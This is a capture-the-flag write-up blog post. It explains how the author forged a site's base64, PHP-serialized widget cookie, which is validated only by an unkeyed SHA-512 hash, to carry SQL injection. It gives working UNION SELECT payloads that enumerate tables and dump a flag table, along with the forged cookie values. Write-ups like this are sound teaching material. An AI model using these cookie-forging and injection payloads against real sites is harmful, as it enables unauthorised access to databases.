Once an account was
registered on the site, the account should have been logged into. This account
can have any username and password.
If you explore the page you
will find that there is a background image of a dog. The CSS also had an ASCII
image of a dog and contained text that said “Doge flage is the key,” which was
later changed to “doge flage is not the key.” These were all red-herrings and
did not play a part in finding the key at all.
You could also make widgets
on this site and after some observation, you could see the cookies on the page
change when a new widget was created.
The widget_tracker cookie was
found to be base64 encoded and could be converted to an ASCII string along the
lines of:
a:“number of widgets”:{i:“widget one”;id:“widget one id”;i:“widget two”;id:“widget one id”;}
a:“number of widgets”:{i:“widget one”;id:“widget one id”;i:“widget two”;id:“widget one id”;}
The widget_validate cookie
was found to be just a sha512 encryption of this string.
After a lot of testing, we
found that cookies could be modified an passed containing SQL injections. The
format for them was similar to the following:
a:“number of widgets”:{i:“widget one”;s: “length of injection”:”injection”;}
a:“number of widgets”:{i:“widget one”;s: “length of injection”:”injection”;}
A useful tool for editing
cookies is the “edit this cookie” extension for chrome. Remember to find the
length of the injection and input the value after “s:”
By experimenting with SQL
injections we were able to determine there was an information schema with four
columns using the following ASCII value of the cookies.
a:1:{i:0;s:109:"7933 or 1-1) UNION SELECT TABLE_NAME, TABLE_NAME, TABLE_NAME, TABLE_NAME FROM information_schema.tables; -- ";}
a:1:{i:0;s:109:"7933 or 1-1) UNION SELECT TABLE_NAME, TABLE_NAME, TABLE_NAME, TABLE_NAME FROM information_schema.tables; -- ";}
Within this information schema there was a table named flag. So a new cookie was made to view this table using the following ASCII string:
a:1:{i:0;s:44:"7933) UNION SELECT *, 1, 2, 3 FROM flag; -- ";}
This created the widget_tracker
base64 cookie: YToxOntpOjA7czo0NDoiNzkzMykgVU5JT04gU0VMRUNUICosIDEsIDIsIDMgRlJPTSBmbGFnOyAtLSAiO30%3D
This also create the
widget_validate cookie: 17cd76a036f7541bac1e669ffada8a9389848e9bd19606689860a294f37800216bd6cfa37c2ff2a402c7809b94fb28185958ddfeb14373f0d4694c48a9704682
These were submitted and the page was refreshed (shown below).
If you inspect an element on the page and shift through the code you will find the key! “key{needs_moar_hmac}”
-hackarali
No comments:
Post a Comment